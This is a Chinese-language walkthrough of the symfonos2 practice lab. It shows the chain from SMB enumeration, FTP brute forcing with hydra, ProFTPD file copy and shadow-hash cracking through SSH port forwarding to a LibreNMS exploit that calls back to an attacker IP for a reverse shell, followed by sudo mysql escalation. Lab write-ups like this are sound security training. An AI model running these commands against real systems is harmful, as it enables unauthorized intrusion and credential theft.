从hash碰撞到ssh端口转发渗透内网:靶机练习之symfonos2
信息搜集nmap -sn 192.168.8.0/24nmap -sT --min-rate 10000 192.168.8.7 -p重点关注445和21端口一个smb一个ftp,这两个都是有关存储的nmap -sT -sC -sV -O 192.168.8.7 -p21,22,80,139,445 -oA portssmb渗透enum4linux 192.168.8.7 -e US有个匿名登录smbclient //192.168.8.7/anonymous有一个日志文件mget logs.txt泄露文件分析存储了一个shadow.bak密码文件到备份文件夹泄露了一个ftp用户名ftp渗透之前端口扫描的时候探测到了ftp的版本ftp爆破之前文件泄露中拿到了一个文件名尝试进行爆破,这个等待时间较长hydra -l aeolus -P /usr/share/wordlists/rockyou.txt -f ftp://192.168.8.7ps第一次打的时候爆破出来了第二次耗了两个小时才出来这个应该不是常规路径不推荐未授权文件复制漏洞利用有历史漏洞但是目录没有写入权限没有办法直接反弹shell尝试文件复制把shadow.bak文件复制到smb共享文件夹中ftp site cpfr /var/backups/shadow.bak 350 File or directory exists, ready for destination name ftp site cpto /home/aeolus/share/shadow.bak 250 Copy successful下载shadow文件hash碰撞john pass.hash --wordlist/usr/share/wordlists/rockyou.txt拿到第一个凭证aeolus$sergioteamo内网渗透ss -ntlp发现内网还有一个8080端口服务ssh内网端口转发ssh -L 8080:127.0.0.1:8080 aeolus192.168.8.7 -N -L 参数详解 格式-L [本地地址:]本地端口:目标地址:目标端口 -L 8080:127.0.0.1:8080 ↑ ↑ ↑ 本地端口 目标地址 目标端口 - 8080本地端口— 你本机监听 8080 端口 - 127.0.0.1目标地址— 这是相对于远程主机的地址即远程主机的 localhost - 8080目标端口— 远程主机上 127.0.0.1:8080 的服务端口 数据流向 你的电脑:8080 ──SSH加密隧道── 192.168.8.7 ── 192.168.8.7:8080 (本机服务) 当你访问 http://127.0.0.1:8080 时流量会被 SSH 加密后转发到 192.168.8.7然后由远程主机访问它自己的 127.0.0.1:8080。 典型使用场景 远程主机 192.168.8.7 上运行了一个只监听 localhost 的服务如 Web 管理面板、数据库、API 服务这个服务不对外网暴露。通过这条命令你可以安全地在你本地直接访问该服务就像它在本地运行一样。 -N 的作用 不加 -N 的话SSH 连接后会给你一个远程 shell。加上 -N 表示不执行远程命令连接建立后终端会挂起只维持隧道不打开 shell。适合单纯做端口转发时使用。发现是一个librenms服务librenms渗透尝试用刚才获取的凭证成功登录后台查找漏洞利用searchsploit librenms查看利用方式发现需要登录的cookieburp登录抓包拿到cookiepython2 47044.py http://127.0.0.1:8080/ PHPSESSIDsr2acfp9qithdfben944bgrmh6; XSRF-TOKENeyJpdiI6ImZJWUtCRjB2Q3AwM1UzNWJPTWJjbnc9PSIsInZhbHVlIjoiVzRzOHkzZ1wvUDNMcWticUl1REdGMDUxTmVqRTlGT2U0cCtFT1JZTTNkMFh5T0V5NWtOQTRyR291TkI5K1NXVDB1Ukoyb0pDQVUrZG1MQnBKaStcLzlkZz09IiwibWFjIjoiOTEzODY1ZTJlMjRhZGE0ODIzZWYwM2Y4YjE2MDNjMWU1MTMxNTBjNDFkMTE5NWRjOTVjM2QxNTVmMTMzMTg4ZiJ9; librenms_sessioneyJpdiI6IjF0OVZPSUtsOU5pSnNMMEl5eld2RWc9PSIsInZhbHVlIjoiOWoxSFM2cmV4Mm13S0pXRzd1RG55T1duc2srNEk0VGtrUDRqNlFKZmtyWVpLRlQ1Zk0zS2hlXC85RWNpd1wva0RVRThZdVJiazFZWTltRmpFeTdkeGJLUT09IiwibWFjIjoiZjM5ZTk5ZTQyOGRhNDEwNWZiNGYyMTc0ZjQyMjc3NmRkOTk0MGY1YmMyYzc2MDExMWEwN2U3ZmQxNWQ4YzM5YiJ9 192.168.8.11 4444启动msf配置参数成功拿到shellsudo提权sudo -l可以免密执行sudo权限的mysqlGTFOBINs提权成功提权补充一个兔子洞内网还有一个邮件服务,exim 4.89有一个本地提权漏洞似乎无法成功利用小结一下靶机整理难度不高主要是针对smb泄露文件展开两条思路进一步攻击一个是用户名aeolus去爆破一个是shadow备份文件和共享文件路径泄露通过proftpd文件复制漏洞拿到shadow备份文件进行hash碰撞后面的内网渗透ssh端口转发思路都非常流畅是一台很好的练手的靶机

相关新闻

C++智能指针循环引用:原理剖析与weak_ptr解决方案

C++智能指针循环引用:原理剖析与weak_ptr解决方案

1. 项目概述:从“内存泄漏”到“循环引用”的智能指针进阶之路在C的世界里,手动管理内存就像在雷区里跳舞,一个new和delete的疏忽,就可能引发程序崩溃或难以追踪的内存泄漏。智能指针的出现,特别是C11引入的std::share…

2026/7/24 5:53:56 阅读更多 →
单目摄像头实现低成本前向碰撞预警系统

单目摄像头实现低成本前向碰撞预警系统

1. 项目背景与核心价值 在智能驾驶辅助系统中,前向碰撞预警(FCW)是最基础也最关键的主动安全功能之一。传统方案通常依赖毫米波雷达或激光雷达,但高昂的成本限制了普及。这个项目展示了如何用普通单目摄像头深度学习实现高性价比的…

2026/7/24 5:53:56 阅读更多 →
盾构施工数字化管控体系,依托无线传输实现隧道PLC工况采集、远程指令下发案例

盾构施工数字化管控体系,依托无线传输实现隧道PLC工况采集、远程指令下发案例

1、项目概况某城市地下综合隧道施工项目,隧道施工工况极为特殊,地下空间密闭、金属设备密集、岩土遮挡严重,同时盾构机高频作业产生大量电磁干扰、振动干扰,通讯环境极其严苛。原有通讯方案存在诸多致命短板:一是有线线缆随掘进延…

2026/7/24 5:52:56 阅读更多 →

最新新闻

C++ STL队列进阶:线程安全、性能优化与底层容器深度解析

C++ STL队列进阶:线程安全、性能优化与底层容器深度解析

1. 项目概述:为什么队列是C开发者的“隐形守护者”在C的日常开发中,尤其是涉及到任务调度、数据缓冲、广度优先搜索(BFS)算法或者任何需要“先进先出”处理逻辑的场景,你几乎无法绕开一个数据结构——队列。很多新手在…

2026/7/24 6:01:59 阅读更多 →
TLV320AIC3254音频编解码器PCB布局与电路设计实战指南

TLV320AIC3254音频编解码器PCB布局与电路设计实战指南

1. 项目概述与核心价值在嵌入式音频系统开发中,选对一颗音频编解码器只是第一步,真正决定最终音质和系统稳定性的,往往是那些数据手册里一笔带过、但在实际PCB布局和电路设计中至关重要的细节。TLV320AIC3254作为德州仪器旗下一款高度集成的立…

2026/7/24 6:01:59 阅读更多 →
BQ41Z50电池管理芯片:智能充电算法与工程配置实战

BQ41Z50电池管理芯片:智能充电算法与工程配置实战

1. 项目概述:为什么我们需要一个“聪明”的充电管家?在电池供电设备的设计中,最让工程师头疼的问题之一,往往不是如何让电池充得更快,而是如何让它充得更“聪明”、更安全、更长寿。我见过太多项目,初期只关…

2026/7/24 6:01:59 阅读更多 →
Google Flash模型工具:数学公式转3D打印的完整实践指南

Google Flash模型工具:数学公式转3D打印的完整实践指南

在数学可视化与 3D 打印技术结合的领域,Google 推出的 Flash 模型生成工具为数学艺术创作带来了新的可能性。这个工具能够将抽象的数学公式和算法快速转化为可 3D 打印的实体模型,特别适合数学爱好者、教育工作者和数字艺术创作者使用。通过将数学函数、…

2026/7/24 6:01:59 阅读更多 →
TVP5146与TVP5150A VBI原始数据模式配置详解与工程实践

TVP5146与TVP5150A VBI原始数据模式配置详解与工程实践

1. 项目概述在数字视频处理系统的开发中,我们常常会遇到一个看似边缘但实则关键的需求:如何从模拟视频信号中,无损地提取那些隐藏在“看不见”的时段里的数据?这些数据,比如我们熟悉的隐藏字幕、图文电视信息&#xff…

2026/7/24 6:01:59 阅读更多 →
AI同义替换技术:高效解决写作降重难题

AI同义替换技术:高效解决写作降重难题

1. 项目概述:AI同义替换如何解决写作降重难题去年帮一位研究生处理论文时,我亲眼见证了传统降重方法的低效——他们团队花了整整两周手工改写,查重率却只从38%降到22%。这正是促使我深入研究AI同义替换技术的契机。当前内容创作领域普遍存在三…

2026/7/24 6:00:58 阅读更多 →

日新闻

用Highcharts 创建可拖拽三维散点立方体3D图表

用Highcharts 创建可拖拽三维散点立方体3D图表

该案例基于Highcharts scatter3d 三维散点图实现空间立方体散点可视化,核心特色:三维 X/Y/Z 三轴空间,所有散点分布在 0~10 立方体空间内;散点使用径向渐变实现立体 3D 圆球质感;支持鼠标 / 触屏拖拽画布,…

2026/7/24 0:00:29 阅读更多 →
AppCertDlls:进程创建路径上的 DLL 入口

AppCertDlls:进程创建路径上的 DLL 入口

AppCertDlls:进程创建路径上的 DLL 入口 AppCertDlls 位于 HKLM\System\CurrentControlSet\Control\Session Manager\AppCertDlls。本文的程序功能是只读列出这个键在 64 位和 32 位注册表视图中的全部值,并显示每条值的来源、名称、类型和可安全显示的数…

2026/7/24 0:00:29 阅读更多 →
我的编程之路:第一篇博客

我的编程之路:第一篇博客

大家好,我是一名编程初学者,同时这也是我编程学习之路上的第一篇博客。在这里,我想要向大家介绍我的一些想法和规划。a.自我介绍我是一个刚刚接触编程的新手,目前在学习c语言,我对编程世界充满了强烈的好奇。当然&…

2026/7/24 0:00:29 阅读更多 →

周新闻

Go语言静态资源打包方案对比与实践指南

Go语言静态资源打包方案对比与实践指南

1. 项目背景与核心需求在Go语言开发中,我们经常需要处理静态资源文件的打包问题。无论是Web应用的模板文件、前端资源,还是配置文件、证书等,都需要随程序一起分发。传统做法是将这些文件与编译后的二进制文件放在同一目录下,但这…

2026/7/24 3:59:20 阅读更多 →
Go语言实现高性能LDAP认证服务的架构与实践

Go语言实现高性能LDAP认证服务的架构与实践

1. 项目背景与核心价值LDAP(轻量级目录访问协议)作为企业级身份认证的黄金标准,已经服务了超过80%的财富500强公司。我在金融科技领域实施统一认证体系时,发现传统Java方案存在启动慢、内存占用高等痛点。而Go语言凭借其协程并发模…

2026/7/24 1:23:39 阅读更多 →
【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

更多请点击: https://intelliparadigm.com 第一章:AI面试官实战指南的核心价值与适用场景 AI面试官并非替代人类HR的“黑箱工具”,而是以可解释、可审计、可迭代的方式,赋能招聘全链路的关键基础设施。其核心价值在于将主观经验沉…

2026/7/23 17:49:47 阅读更多 →

月新闻